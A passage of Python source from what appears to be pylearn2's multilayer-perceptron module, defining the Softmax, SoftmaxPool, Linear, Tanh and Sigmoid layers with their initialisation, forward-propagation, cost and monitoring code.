the cost much more quickly than if it needs to convert the targets
into a VectorSpace. With binary_target_dim>1, you can use one layer
to simultaneously predict a bag of words (i.e. order is not important,
the same element can be included more than once).
non_redundant : bool
If True, learns only n_classes - 1 biases and weight vectors
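    Examples
    --------
    A typical construction sketch; the name, class count and
    initialization range are arbitrary illustrative choices:
    >>> from pylearn2.models.mlp import Softmax
    >>> output_layer = Softmax(n_classes=10, layer_name='y', irange=0.05)
    If the targets are integer class labels rather than one-hot vectors,
    `binary_target_dim` can be used instead:
    >>> output_layer = Softmax(n_classes=10, layer_name='y', irange=0.05,
    ...                        binary_target_dim=1)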
"""
def __init__(self, n_classes, layer_name, irange=None,
istdev=None,
sparse_init=None, W_lr_scale=None,
b_lr_scale=None, max_row_norm=None,
no_affine=False,
max_col_norm=None, init_bias_target_marginals=None,
binary_target_dim=None, non_redundant=False):
super(Softmax, self).__init__()
if max_col_norm is not None:
self.extensions.append(MaxL2FilterNorm(max_col_norm))
if non_redundant:
if init_bias_target_marginals:
msg = ("init_bias_target_marginals currently only works "
"with the overcomplete parameterization.")
raise NotImplementedError(msg)
if isinstance(W_lr_scale, str):
W_lr_scale = float(W_lr_scale)
self.__dict__.update(locals())
del self.self
del self.init_bias_target_marginals
if not isinstance(n_classes, py_integer_types):
raise TypeError("n_classes is of type %s, but must be integer" %
type(n_classes))
if binary_target_dim is not None:
assert isinstance(binary_target_dim, py_integer_types)
self._has_binary_target = True
self._target_space = IndexSpace(dim=binary_target_dim,
max_labels=n_classes)
else:
self._has_binary_target = False
self.output_space = VectorSpace(n_classes)
if not no_affine:
self.b = sharedX(np.zeros((n_classes - self.non_redundant,)),
name='softmax_b')
if init_bias_target_marginals:
y = init_bias_target_marginals.y
if init_bias_target_marginals.y_labels is None:
marginals = y.mean(axis=0)
else:
# compute class frequencies
if np.max(y.shape) != np.prod(y.shape):
raise AssertionError("Use of "
"`init_bias_target_marginals` "
"requires that each example has "
"a single label.")
marginals = np.bincount(y.flat) / float(y.shape[0])
assert marginals.ndim == 1
b = pseudoinverse_softmax_numpy(marginals).astype(self.b.dtype)
assert b.ndim == 1
assert b.dtype == self.b.dtype
self.b.set_value(b)
else:
assert init_bias_target_marginals is None
def __setstate__(self, state):
super(Softmax, self).__setstate__(state)
# Patch old pickle files
if not hasattr(self, 'non_redundant'):
self.non_redundant = False
if not hasattr(self, 'mask_weights'):
self.mask_weights = None
@wraps(Layer.get_lr_scalers)
def get_lr_scalers(self):
rval = OrderedDict()
if self.W_lr_scale is not None:
assert isinstance(self.W_lr_scale, float)
rval[self.W] = self.W_lr_scale
if not hasattr(self, 'b_lr_scale'):
self.b_lr_scale = None
if self.b_lr_scale is not None:
assert isinstance(self.b_lr_scale, float)
rval[self.b] = self.b_lr_scale
return rval
@wraps(Layer.get_layer_monitoring_channels)
def get_layer_monitoring_channels(self, state_below=None,
state=None, targets=None):
rval = OrderedDict()
if not self.no_affine:
W = self.W
assert W.ndim == 2
sq_W = T.sqr(W)
row_norms = T.sqrt(sq_W.sum(axis=1))
col_norms = T.sqrt(sq_W.sum(axis=0))
rval.update(OrderedDict([('row_norms_min', row_norms.min()),
('row_norms_mean', row_norms.mean()),
('row_norms_max', row_norms.max()),
('col_norms_min', col_norms.min()),
('col_norms_mean', col_norms.mean()),
('col_norms_max', col_norms.max()), ]))
if (state_below is not None) or (state is not None):
if state is None:
state = self.fprop(state_below)
mx = state.max(axis=1)
rval.update(OrderedDict([('mean_max_class', mx.mean()),
('max_max_class', mx.max()),
('min_max_class', mx.min())]))
if (targets is not None):
if ((not self._has_binary_target) or
self.binary_target_dim == 1):
# if binary_target_dim>1, the misclass rate is ill-defined
y_hat = T.argmax(state, axis=1)
y = (targets.reshape(y_hat.shape)
if self._has_binary_target
else T.argmax(targets, axis=1))
misclass = T.neq(y, y_hat).mean()
misclass = T.cast(misclass, config.floatX)
rval['misclass'] = misclass
rval['nll'] = self.cost(Y_hat=state, Y=targets)
return rval
@wraps(Layer.set_input_space)
def set_input_space(self, space):
self.input_space = space
if not isinstance(space, Space):
raise TypeError("Expected Space, got " +
str(space) + " of type " + str(type(space)))
self.input_dim = space.get_total_dimension()
self.needs_reformat = not isinstance(space, VectorSpace)
if self.no_affine:
desired_dim = self.n_classes - self.non_redundant
assert self.input_dim == desired_dim
else:
desired_dim = self.input_dim
self.desired_space = VectorSpace(desired_dim)
if not self.needs_reformat:
assert self.desired_space == self.input_space
rng = self.mlp.rng
if self.no_affine:
self._params = []
else:
num_cols = self.n_classes - self.non_redundant
if self.irange is not None:
assert self.istdev is None
assert self.sparse_init is None
W = rng.uniform(-self.irange,
self.irange,
(self.input_dim, num_cols))
elif self.istdev is not None:
assert self.sparse_init is None
W = rng.randn(self.input_dim, num_cols) * self.istdev
else:
assert self.sparse_init is not None
W = np.zeros((self.input_dim, num_cols))
for i in xrange(num_cols):
for j in xrange(self.sparse_init):
idx = rng.randint(0, self.input_dim)
while W[idx, i] != 0.:
idx = rng.randint(0, self.input_dim)
W[idx, i] = rng.randn()
self.W = sharedX(W, 'softmax_W')
self._params = [self.b, self.W]
@wraps(Layer.get_weights_topo)
def get_weights_topo(self):
if not isinstance(self.input_space, Conv2DSpace):
raise NotImplementedError()
desired = self.W.get_value().T
ipt = self.desired_space.np_format_as(desired, self.input_space)
rval = Conv2DSpace.convert_numpy(ipt,
self.input_space.axes,
('b', 0, 1, 'c'))
return rval
@wraps(Layer.get_weights)
def get_weights(self):
if not isinstance(self.input_space, VectorSpace):
raise NotImplementedError()
return self.W.get_value()
@wraps(Layer.set_weights)
def set_weights(self, weights):
self.W.set_value(weights)
@wraps(Layer.set_biases)
def set_biases(self, biases):
self.b.set_value(biases)
@wraps(Layer.get_biases)
def get_biases(self):
return self.b.get_value()
@wraps(Layer.get_weights_format)
def get_weights_format(self):
return ('v', 'h')
@wraps(Layer.fprop)
def fprop(self, state_below):
self.input_space.validate(state_below)
if self.needs_reformat:
state_below = self.input_space.format_as(state_below,
self.desired_space)
self.desired_space.validate(state_below)
assert state_below.ndim == 2
if not hasattr(self, 'no_affine'):
self.no_affine = False
if self.no_affine:
Z = state_below
else:
assert self.W.ndim == 2
b = self.b
Z = T.dot(state_below, self.W) + b
if self.non_redundant:
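            # With the non-redundant parameterization, the first class's
            # logit is fixed at zero and only n_classes - 1 columns of
            # weights (and biases) are learned.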
zeros = T.alloc(0., Z.shape[0], 1)
Z = T.concatenate((zeros, Z), axis=1)
rval = T.nnet.softmax(Z)
for value in get_debug_values(rval):
if self.mlp.batch_size is not None:
assert value.shape[0] == self.mlp.batch_size
return rval
def _cost(self, Y, Y_hat):
z = arg_of_softmax(Y_hat)
assert z.ndim == 2
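        # Numerically stable log-softmax: subtracting the row-wise max
        # before exponentiating leaves the softmax unchanged but avoids
        # overflow in T.exp.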
z = z - z.max(axis=1).dimshuffle(0, 'x')
log_prob = z - T.log(T.exp(z).sum(axis=1).dimshuffle(0, 'x'))
# we use sum and not mean because this is really one variable per row
if self._has_binary_target:
# The following code is the equivalent of accessing log_prob by the
# indices in Y, but it is written such that the computation can
# happen on the GPU rather than CPU.
flat_Y = Y.flatten()
flat_Y.name = 'flat_Y'
flat_log_prob = log_prob.flatten()
flat_log_prob.name = 'flat_log_prob'
range_ = T.arange(Y.shape[0])
if self.binary_target_dim > 1:
# because of an error in optimization (local_useless_tile)
# when tiling with (1, 1)
range_ = T.tile(range_.dimshuffle(0, 'x'),
(1, self.binary_target_dim)).flatten()
flat_indices = flat_Y + range_ * self.n_classes
flat_indices.name = 'flat_indices'
log_prob_of = flat_log_prob[flat_indices].reshape(Y.shape, ndim=2)
log_prob_of.name = 'log_prob_of'
else:
log_prob_of = (Y * log_prob)
return log_prob_of
@wraps(Layer.cost)
def cost(self, Y, Y_hat):
log_prob_of = self._cost(Y, Y_hat).sum(axis=1)
assert log_prob_of.ndim == 1
rval = log_prob_of.mean()
return - rval
@wraps(Layer.cost_matrix)
def cost_matrix(self, Y, Y_hat):
log_prob_of = self._cost(Y, Y_hat)
if self._has_binary_target:
flat_Y = Y.flatten()
flat_matrix = T.alloc(0, (Y.shape[0] * log_prob_of.shape[1]))
flat_indices = flat_Y + T.extra_ops.repeat(
T.arange(Y.shape[0]) * log_prob_of.shape[1], Y.shape[1]
)
log_prob_of = T.set_subtensor(flat_matrix[flat_indices], flat_Y)
return -log_prob_of
@wraps(Layer.get_weight_decay)
def get_weight_decay(self, coeff):
if isinstance(coeff, str):
coeff = float(coeff)
assert isinstance(coeff, float) or hasattr(coeff, 'dtype')
return coeff * T.sqr(self.W).sum()
@wraps(Layer.get_l1_weight_decay)
def get_l1_weight_decay(self, coeff):
if isinstance(coeff, str):
coeff = float(coeff)
assert isinstance(coeff, float) or hasattr(coeff, 'dtype')
W = self.W
return coeff * abs(W).sum()
@wraps(Layer._modify_updates)
def _modify_updates(self, updates):
if self.no_affine:
return
if self.max_row_norm is not None:
W = self.W
if W in updates:
updated_W = updates[W]
row_norms = T.sqrt(T.sum(T.sqr(updated_W), axis=1))
desired_norms = T.clip(row_norms, 0, self.max_row_norm)
scales = desired_norms / (1e-7 + row_norms)
updates[W] = updated_W * scales.dimshuffle(0, 'x')
class SoftmaxPool(Layer):
"""
A hidden layer that uses the softmax function to do max pooling over groups
of units. When the pooling size is 1, this reduces to a standard sigmoidal
MLP layer.
Parameters
----------
    detector_layer_dim : int
        The number of units in the detector (pre-pooling) layer.
    layer_name : str
        The name of the layer. All layers in an MLP must have a unique
        name.
    pool_size : int
        The number of detector units pooled together into each output
        unit. Must evenly divide `detector_layer_dim`.
    irange : float, optional
        If specified, initialize each weight randomly in
        U(-irange, irange).
    sparse_init : int, optional
        If specified, initialize `sparse_init` randomly chosen weights
        per unit from N(0, 1) and leave the rest at 0.
    sparse_stdev : float, optional
        Multiply sparsely initialized weights by this constant.
include_prob : float, optional
Probability of including a weight element in the set of weights
initialized to U(-irange, irange). If not included it is
initialized to 0.
    init_bias : float or ndarray, optional
        Initial value of the biases.
    W_lr_scale : float, optional
        Multiply the learning rate on the weights by this constant.
    b_lr_scale : float, optional
        Multiply the learning rate on the biases by this constant.
    mask_weights : ndarray, optional
        If provided, the weights will be multiplied by this mask after
        each learning update.
    max_col_norm : float, optional
        Maximum norm for a column of the weight matrix, enforced after
        each learning update.
"""
def __init__(self,
detector_layer_dim,
layer_name,
pool_size=1,
irange=None,
sparse_init=None,
sparse_stdev=1.,
include_prob=1.0,
init_bias=0.,
W_lr_scale=None,
b_lr_scale=None,
mask_weights=None,
max_col_norm=None):
super(SoftmaxPool, self).__init__()
self.__dict__.update(locals())
del self.self
self.b = sharedX(np.zeros((self.detector_layer_dim,)) + init_bias,
name=(layer_name + '_b'))
@wraps(Layer.get_lr_scalers)
def get_lr_scalers(self):
if not hasattr(self, 'W_lr_scale'):
self.W_lr_scale = None
if not hasattr(self, 'b_lr_scale'):
self.b_lr_scale = None
rval = OrderedDict()
if self.W_lr_scale is not None:
W, = self.transformer.get_params()
rval[W] = self.W_lr_scale
if self.b_lr_scale is not None:
rval[self.b] = self.b_lr_scale
return rval
@wraps(Layer.set_input_space)
def set_input_space(self, space):
self.input_space = space
if isinstance(space, VectorSpace):
self.requires_reformat = False
self.input_dim = space.dim
else:
self.requires_reformat = True
self.input_dim = space.get_total_dimension()
self.desired_space = VectorSpace(self.input_dim)
if not (self.detector_layer_dim % self.pool_size == 0):
raise ValueError("detector_layer_dim = %d, pool_size = %d. "
"Should be divisible but remainder is %d" %
(self.detector_layer_dim,
self.pool_size,
self.detector_layer_dim % self.pool_size))
self.h_space = VectorSpace(self.detector_layer_dim)
self.pool_layer_dim = self.detector_layer_dim / self.pool_size
self.output_space = VectorSpace(self.pool_layer_dim)
rng = self.mlp.rng
if self.irange is not None:
assert self.sparse_init is None
W = rng.uniform(-self.irange,
self.irange,
(self.input_dim, self.detector_layer_dim)) * \
(rng.uniform(0., 1., (self.input_dim, self.detector_layer_dim))
< self.include_prob)
else:
assert self.sparse_init is not None
W = np.zeros((self.input_dim, self.detector_layer_dim))
def mask_rejects(idx, i):
if self.mask_weights is None:
return False
return self.mask_weights[idx, i] == 0.
for i in xrange(self.detector_layer_dim):
assert self.sparse_init <= self.input_dim
for j in xrange(self.sparse_init):
idx = rng.randint(0, self.input_dim)
while W[idx, i] != 0 or mask_rejects(idx, i):
idx = rng.randint(0, self.input_dim)
W[idx, i] = rng.randn()
W *= self.sparse_stdev
W = sharedX(W)
W.name = self.layer_name + '_W'
self.transformer = MatrixMul(W)
W, = self.transformer.get_params()
assert W.name is not None
if self.mask_weights is not None:
expected_shape = (self.input_dim, self.detector_layer_dim)
if expected_shape != self.mask_weights.shape:
raise ValueError("Expected mask with shape " +
str(expected_shape) +
" but got " +
str(self.mask_weights.shape))
self.mask = sharedX(self.mask_weights)
@wraps(Layer._modify_updates)
def _modify_updates(self, updates):
if self.mask_weights is not None:
W, = self.transformer.get_params()
if W in updates:
updates[W] = updates[W] * self.mask
if self.max_col_norm is not None:
W, = self.transformer.get_params()
if W in updates:
updated_W = updates[W]
col_norms = T.sqrt(T.sum(T.sqr(updated_W), axis=0))
desired_norms = T.clip(col_norms, 0, self.max_col_norm)
updates[W] = updated_W * (desired_norms / (1e-7 + col_norms))
@wraps(Layer.get_params)
def get_params(self):
assert self.b.name is not None
W, = self.transformer.get_params()
assert W.name is not None
rval = self.transformer.get_params()
assert not isinstance(rval, set)
rval = list(rval)
assert self.b not in rval
rval.append(self.b)
return rval
@wraps(Layer.get_weight_decay)
def get_weight_decay(self, coeff):
if isinstance(coeff, str):
coeff = float(coeff)
assert isinstance(coeff, float) or hasattr(coeff, 'dtype')
W, = self.transformer.get_params()
return coeff * T.sqr(W).sum()
@wraps(Layer.get_l1_weight_decay)
def get_l1_weight_decay(self, coeff):
if isinstance(coeff, str):
coeff = float(coeff)
assert isinstance(coeff, float) or hasattr(coeff, 'dtype')
W, = self.transformer.get_params()
return coeff * abs(W).sum()
@wraps(Layer.get_weights)
def get_weights(self):
if self.requires_reformat:
# This is not really an unimplemented case.
# We actually don't know how to format the weights
# in design space. We got the data in topo space
# and we don't have access to the dataset
raise NotImplementedError()
W, = self.transformer.get_params()
return W.get_value()
@wraps(Layer.set_weights)
def set_weights(self, weights):
W, = self.transformer.get_params()
W.set_value(weights)
@wraps(Layer.set_biases)
def set_biases(self, biases):
"""
        Set the biases of this layer to the given value.
"""
self.b.set_value(biases)
@wraps(Layer.get_biases)
def get_biases(self):
return self.b.get_value()
@wraps(Layer.get_weights_format)
def get_weights_format(self):
return ('v', 'h')
@wraps(Layer.get_weights_view_shape)
def get_weights_view_shape(self):
total = self.detector_layer_dim
cols = self.pool_size
if cols == 1:
# Let the PatchViewer decide how to arrange the units
# when they're not pooled
raise NotImplementedError()
# When they are pooled, make each pooling unit have one row
rows = total / cols
return rows, cols
@wraps(Layer.get_weights_topo)
def get_weights_topo(self):
if not isinstance(self.input_space, Conv2DSpace):
raise NotImplementedError()
W, = self.transformer.get_params()
W = W.T
W = W.reshape((self.detector_layer_dim,
self.input_space.shape[0],
self.input_space.shape[1],
self.input_space.num_channels))
W = Conv2DSpace.convert(W, self.input_space.axes, ('b', 0, 1, 'c'))
return function([], W)()
@wraps(Layer.get_layer_monitoring_channels)
def get_layer_monitoring_channels(self, state_below=None,
state=None, **kwargs):
W, = self.transformer.get_params()
assert W.ndim == 2
sq_W = T.sqr(W)
row_norms = T.sqrt(sq_W.sum(axis=1))
col_norms = T.sqrt(sq_W.sum(axis=0))
rval = OrderedDict([('row_norms_min', row_norms.min()),
('row_norms_mean', row_norms.mean()),
('row_norms_max', row_norms.max()),
('col_norms_min', col_norms.min()),
('col_norms_mean', col_norms.mean()),
('col_norms_max', col_norms.max()), ])
if (state_below is not None) or (state is not None):
if state is None:
P = self.fprop(state_below)
else:
P = state
if self.pool_size == 1:
vars_and_prefixes = [(P, '')]
else:
vars_and_prefixes = [(P, 'p_')]
for var, prefix in vars_and_prefixes:
v_max = var.max(axis=0)
v_min = var.min(axis=0)
v_mean = var.mean(axis=0)
v_range = v_max - v_min
# max_x.mean_u is "the mean over *u*nits of the max over
# e*x*amples" The x and u are included in the name because
# otherwise its hard to remember which axis is which when
# reading the monitor I use inner.outer rather than
# outer_of_inner or something like that because I want
# mean_x.* to appear next to each other in the alphabetical
# list, as these are commonly plotted together
for key, val in [('max_x.max_u', v_max.max()),
('max_x.mean_u', v_max.mean()),
('max_x.min_u', v_max.min()),
('min_x.max_u', v_min.max()),
('min_x.mean_u', v_min.mean()),
('min_x.min_u', v_min.min()),
('range_x.max_u', v_range.max()),
('range_x.mean_u', v_range.mean()),
('range_x.min_u', v_range.min()),
('mean_x.max_u', v_mean.max()),
('mean_x.mean_u', v_mean.mean()),
('mean_x.min_u', v_mean.min())]:
rval[prefix + key] = val
return rval
@wraps(Layer.fprop)
def fprop(self, state_below):
self.input_space.validate(state_below)
if self.requires_reformat:
state_below = self.input_space.format_as(state_below,
self.desired_space)
z = self.transformer.lmul(state_below) + self.b
if self.layer_name is not None:
z.name = self.layer_name + '_z'
p, h = max_pool_channels(z, self.pool_size)
p.name = self.layer_name + '_p_'
return p
class Linear(Layer):
"""
A "linear model" in machine learning terminology. This would be more
accurately described as an affine model because it adds an offset to
the output as well as doing a matrix multiplication. The output is:
output = T.dot(weights, input) + biases
This class may be used as the output layer of an MLP for regression.
    It may also be used as a hidden layer. Most hidden layer classes are
    subclasses of this class that apply a fixed nonlinearity to the
    output of the affine transformation provided by this class.
One notable use of this class is to provide "bottleneck" layers.
By using a Linear layer with few hidden units followed by a nonlinear
layer such as RectifiedLinear with many hidden units, one essentially
gets a RectifiedLinear layer with a factored weight matrix, which can
reduce the number of parameters in the model (by making the effective
weight matrix low rank).
Parameters
----------
dim : int
The number of elements in the output of the layer.
layer_name : str
The name of the layer. All layers in an MLP must have a unique name.
    irange : float, optional
        If specified, initialize each weight randomly in
        U(-irange, irange).
    istdev : float, optional
        If specified, initialize each weight randomly from
        N(0, istdev).
    sparse_init : int, optional
        If specified, initialize `sparse_init` randomly chosen weights
        per unit from N(0, 1) and leave the rest at 0.
    sparse_stdev : float, optional
        Multiply sparsely initialized weights by this constant.
    include_prob : float
        Probability of including a weight element in the set of weights
        initialized to U(-irange, irange). If not included it is
        initialized to 0.
    init_bias : float or ndarray, optional
        Anything that can be broadcasted to a numpy vector.
Provides the initial value of the biases of the model.
When using this class as an output layer (specifically the Linear
class, or subclasses that don't change the output like
LinearGaussian, but not subclasses that change the output, like
Softmax) it can be a good idea to set this to the return value of
the `mean_of_targets` function. This provides the mean value of
all the targets in the training set, so the model is initialized
to a dummy model that predicts the expected value of each output
variable.
W_lr_scale : float, optional
Multiply the learning rate on the weights by this constant.
b_lr_scale : float, optional
Multiply the learning rate on the biases by this constant.
mask_weights : ndarray, optional
If provided, the weights will be multiplied by this mask after each
learning update.
    max_row_norm : float, optional
        Maximum norm for a row of the weight matrix, enforced after each
        learning update.
    max_col_norm : float, optional
        Maximum norm for a column of the weight matrix, enforced after
        each learning update.
    min_col_norm : float, optional
        Minimum norm for a column of the weight matrix, enforced after
        each learning update.
copy_input : REMOVED
use_abs_loss : bool, optional
If True, the cost function will be mean absolute error rather
than mean squared error.
You can think of mean squared error as fitting a Gaussian
distribution with variance 1, or as learning to predict the mean
of the data.
You can think of mean absolute error as fitting a Laplace
distribution with variance 1, or as learning to predict the
median of the data.
use_bias : bool, optional
If False, does not add the bias term to the output.
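    Examples
    --------
    An illustrative sketch of the "bottleneck" pattern described above;
    the names and sizes are arbitrary choices:
    >>> from pylearn2.models.mlp import Linear, RectifiedLinear
    >>> bottleneck = Linear(dim=50, layer_name='bottleneck', irange=0.05)
    >>> hidden = RectifiedLinear(dim=500, layer_name='h0', irange=0.05)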
"""
def __init__(self,
dim,
layer_name,
irange=None,
istdev=None,
sparse_init=None,
sparse_stdev=1.,
include_prob=1.0,
init_bias=0.,
W_lr_scale=None,
b_lr_scale=None,
mask_weights=None,
max_row_norm=None,
max_col_norm=None,
min_col_norm=None,
copy_input=None,
use_abs_loss=False,
use_bias=True):
if copy_input is not None:
raise AssertionError(
"The copy_input option had a bug and has "
"been removed from the library.")
super(Linear, self).__init__()
if use_bias and init_bias is None:
init_bias = 0.
self.__dict__.update(locals())
del self.self
if use_bias:
self.b = sharedX(np.zeros((self.dim,)) + init_bias,
name=(layer_name + '_b'))
else:
assert b_lr_scale is None
            # init_bias is ignored when use_bias is False.
@wraps(Layer.get_lr_scalers)
def get_lr_scalers(self):
if not hasattr(self, 'W_lr_scale'):
self.W_lr_scale = None
if not hasattr(self, 'b_lr_scale'):
self.b_lr_scale = None
rval = OrderedDict()
if self.W_lr_scale is not None:
W, = self.transformer.get_params()
rval[W] = self.W_lr_scale
if self.b_lr_scale is not None:
rval[self.b] = self.b_lr_scale
return rval
@wraps(Layer.set_input_space)
def set_input_space(self, space):
self.input_space = space
if isinstance(space, VectorSpace):
self.requires_reformat = False
self.input_dim = space.dim
else:
self.requires_reformat = True
self.input_dim = space.get_total_dimension()
self.desired_space = VectorSpace(self.input_dim)
self.output_space = VectorSpace(self.dim)
rng = self.mlp.rng
if self.irange is not None:
assert self.istdev is None
assert self.sparse_init is None
W = rng.uniform(-self.irange,
self.irange,
(self.input_dim, self.dim)) * \
(rng.uniform(0., 1., (self.input_dim, self.dim))
< self.include_prob)
elif self.istdev is not None:
assert self.sparse_init is None
W = rng.randn(self.input_dim, self.dim) * self.istdev
else:
assert self.sparse_init is not None
W = np.zeros((self.input_dim, self.dim))
def mask_rejects(idx, i):
if self.mask_weights is None:
return False
return self.mask_weights[idx, i] == 0.
for i in xrange(self.dim):
assert self.sparse_init <= self.input_dim
for j in xrange(self.sparse_init):
idx = rng.randint(0, self.input_dim)
while W[idx, i] != 0 or mask_rejects(idx, i):
idx = rng.randint(0, self.input_dim)
W[idx, i] = rng.randn()
W *= self.sparse_stdev
W = sharedX(W)
W.name = self.layer_name + '_W'
self.transformer = MatrixMul(W)
W, = self.transformer.get_params()
assert W.name is not None
if self.mask_weights is not None:
expected_shape = (self.input_dim, self.dim)
if expected_shape != self.mask_weights.shape:
raise ValueError("Expected mask with shape " +
str(expected_shape) + " but got " +
str(self.mask_weights.shape))
self.mask = sharedX(self.mask_weights)
@wraps(Layer._modify_updates)
def _modify_updates(self, updates):
if self.mask_weights is not None:
W, = self.transformer.get_params()
if W in updates:
updates[W] = updates[W] * self.mask
if self.max_row_norm is not None:
W, = self.transformer.get_params()
if W in updates:
updated_W = updates[W]
row_norms = T.sqrt(T.sum(T.sqr(updated_W), axis=1))
desired_norms = T.clip(row_norms, 0, self.max_row_norm)
scales = desired_norms / (1e-7 + row_norms)
updates[W] = updated_W * scales.dimshuffle(0, 'x')
if self.max_col_norm is not None or self.min_col_norm is not None:
assert self.max_row_norm is None
if self.max_col_norm is not None:
max_col_norm = self.max_col_norm
if self.min_col_norm is None:
self.min_col_norm = 0
W, = self.transformer.get_params()
if W in updates:
updated_W = updates[W]
col_norms = T.sqrt(T.sum(T.sqr(updated_W), axis=0))
if self.max_col_norm is None:
max_col_norm = col_norms.max()
desired_norms = T.clip(col_norms,
self.min_col_norm,
max_col_norm)
updates[W] = updated_W * desired_norms / (1e-7 + col_norms)
@wraps(Layer.get_params)
def get_params(self):
W, = self.transformer.get_params()
assert W.name is not None
rval = self.transformer.get_params()
assert not isinstance(rval, set)
rval = list(rval)
if self.use_bias:
assert self.b.name is not None
assert self.b not in rval
rval.append(self.b)
return rval
@wraps(Layer.get_weight_decay)
def get_weight_decay(self, coeff):
if isinstance(coeff, str):
coeff = float(coeff)
assert isinstance(coeff, float) or hasattr(coeff, 'dtype')
W, = self.transformer.get_params()
return coeff * T.sqr(W).sum()
@wraps(Layer.get_l1_weight_decay)
def get_l1_weight_decay(self, coeff):
if isinstance(coeff, str):
coeff = float(coeff)
assert isinstance(coeff, float) or hasattr(coeff, 'dtype')
W, = self.transformer.get_params()
return coeff * abs(W).sum()
@wraps(Layer.get_weights)
def get_weights(self):
if self.requires_reformat:
# This is not really an unimplemented case.
# We actually don't know how to format the weights
# in design space. We got the data in topo space
# and we don't have access to the dataset
raise NotImplementedError()
W, = self.transformer.get_params()
W = W.get_value()
return W
@wraps(Layer.set_weights)
def set_weights(self, weights):
W, = self.transformer.get_params()
W.set_value(weights)
@wraps(Layer.set_biases)
def set_biases(self, biases):
self.b.set_value(biases)
@wraps(Layer.get_biases)
def get_biases(self):
"""
        Return the current value of the biases as a numpy array.
"""
return self.b.get_value()
@wraps(Layer.get_weights_format)
def get_weights_format(self):
return ('v', 'h')
@wraps(Layer.get_weights_topo)
def get_weights_topo(self):
if not isinstance(self.input_space, Conv2DSpace):
raise NotImplementedError()
W, = self.transformer.get_params()
W = W.T
W = W.reshape((self.dim, self.input_space.shape[0],
self.input_space.shape[1],
self.input_space.num_channels))
W = Conv2DSpace.convert(W, self.input_space.axes, ('b', 0, 1, 'c'))
return function([], W)()
@wraps(Layer.get_layer_monitoring_channels)
def get_layer_monitoring_channels(self, state_below=None,
state=None, targets=None):
W, = self.transformer.get_params()
assert W.ndim == 2
sq_W = T.sqr(W)
row_norms = T.sqrt(sq_W.sum(axis=1))
col_norms = T.sqrt(sq_W.sum(axis=0))
rval = OrderedDict([('row_norms_min', row_norms.min()),
('row_norms_mean', row_norms.mean()),
('row_norms_max', row_norms.max()),
('col_norms_min', col_norms.min()),
('col_norms_mean', col_norms.mean()),
('col_norms_max', col_norms.max()), ])
if (state is not None) or (state_below is not None):
if state is None:
state = self.fprop(state_below)
mx = state.max(axis=0)
mean = state.mean(axis=0)
mn = state.min(axis=0)
rg = mx - mn
rval['range_x_max_u'] = rg.max()
rval['range_x_mean_u'] = rg.mean()
rval['range_x_min_u'] = rg.min()
rval['max_x_max_u'] = mx.max()
rval['max_x_mean_u'] = mx.mean()
rval['max_x_min_u'] = mx.min()
rval['mean_x_max_u'] = mean.max()
rval['mean_x_mean_u'] = mean.mean()
rval['mean_x_min_u'] = mean.min()
rval['min_x_max_u'] = mn.max()
rval['min_x_mean_u'] = mn.mean()
rval['min_x_min_u'] = mn.min()
return rval
def _linear_part(self, state_below):
"""
Parameters
----------
state_below : member of input_space
Returns
-------
output : theano matrix
Affine transformation of state_below
"""
self.input_space.validate(state_below)
if self.requires_reformat:
state_below = self.input_space.format_as(state_below,
self.desired_space)
z = self.transformer.lmul(state_below)
if self.use_bias:
z += self.b
if self.layer_name is not None:
z.name = self.layer_name + '_z'
return z
@wraps(Layer.fprop)
def fprop(self, state_below):
p = self._linear_part(state_below)
return p
@wraps(Layer.cost)
def cost(self, Y, Y_hat):
return self.cost_from_cost_matrix(self.cost_matrix(Y, Y_hat))
@wraps(Layer.cost_from_cost_matrix)
def cost_from_cost_matrix(self, cost_matrix):
return cost_matrix.sum(axis=1).mean()
@wraps(Layer.cost_matrix)
def cost_matrix(self, Y, Y_hat):
if(self.use_abs_loss):
return T.abs_(Y - Y_hat)
else:
return T.sqr(Y - Y_hat)
class Tanh(Linear):
"""
A layer that performs an affine transformation of its (vectorial)
input followed by a hyperbolic tangent elementwise nonlinearity.
Parameters
----------
kwargs : dict
Keyword arguments to pass through to `Linear` class constructor.
"""
@wraps(Layer.fprop)
def fprop(self, state_below):
p = self._linear_part(state_below)
p = T.tanh(p)
return p
@wraps(Layer.cost)
def cost(self, *args, **kwargs):
raise NotImplementedError()
class Sigmoid(Linear):
"""
A layer that performs an affine transformation of its
input followed by a logistic sigmoid elementwise nonlinearity.
Parameters
----------
monitor_style : string
Values can be any of ['detection', 'one_hot_class',
'bit_vector_class']
'detection' is the default.
- 'detection' : get_monitor_from_state makes no assumptions about
target, reports info about how good model is at
detecting positive bits.
This will monitor precision, recall, and F1 score
based on a detection threshold of 0.5. Note that
these quantities are computed *per-minibatch* and
averaged together. Unless your entire monitoring
dataset fits in one minibatch, this is not the same
as the true F1 score, etc., and will usually
seriously overestimate your performance.
- 'one_hot_class' : get_monitor_from_state assumes target is
one-hot class indicator, even though you're training the
model as k independent sigmoids. Gives info on how
good the argmax over the sigmoids behaves as a classifier.
- 'bit_vector_class' : get_monitor_from_state treats each
sigmoid as predicting a 1 iff its value is > 0.5. Each
example is counted as correct iff all of the bits in its
target are predicted correctly.
This includes as a special case the situation where the
target is a single 0 or 1 label.
- 'classification' : deprecated; originally this string was
used for 'one_hot_class', then due to a miscommunication
it was changed to be used for 'bit_vector_class'.
kwargs : dict
Passed through to the Layer class constructor
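    Examples
    --------
    A construction sketch for a ten-way multi-label output layer; the
    values are arbitrary illustrative choices:
    >>> from pylearn2.models.mlp import Sigmoid
    >>> output_layer = Sigmoid(layer_name='y', dim=10, irange=0.05,
    ...                        monitor_style='detection')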
"""
def __init__(self, monitor_style='detection', **kwargs):
super(Sigmoid, self).__init__(**kwargs)
if monitor_style == 'classification':
monitor_style = 'bit_vector_class'
warnings.warn("The 'classification' monitor style is deprecated."
" Switch to 'bit_vector_class' (or possibly"
" 'one_hot_class' if your code predates 8f4b62b3df)."
" 'classification' may be removed on or after "
"2015-04-21.")
assert monitor_style in ['one_hot_class', 'bit_vector_class',
'detection']
self.monitor_style = monitor_style
@wraps(Layer.fprop)
def fprop(self, state_below):
p = self._linear_part(state_below)
p = T.nnet.sigmoid(p)
return p
@wraps(Layer.cost)
def cost(self, Y, Y_hat):
"""
Returns a batch (vector) of
mean across units of KL divergence for each example.
Parameters
----------
Y : theano.gof.Variable
Targets
Y_hat : theano.gof.Variable
Output of `fprop`
        Returns
        -------
        ave : theano.gof.Variable
            Mean across units and across the batch of the KL divergence.
Notes
-----
Uses KL(P || Q) where P is defined by Y and Q is defined by Y_hat
Currently Y must be purely binary. If it's not, you'll still
get the right gradient, but the value in the monitoring channel
will be wrong.
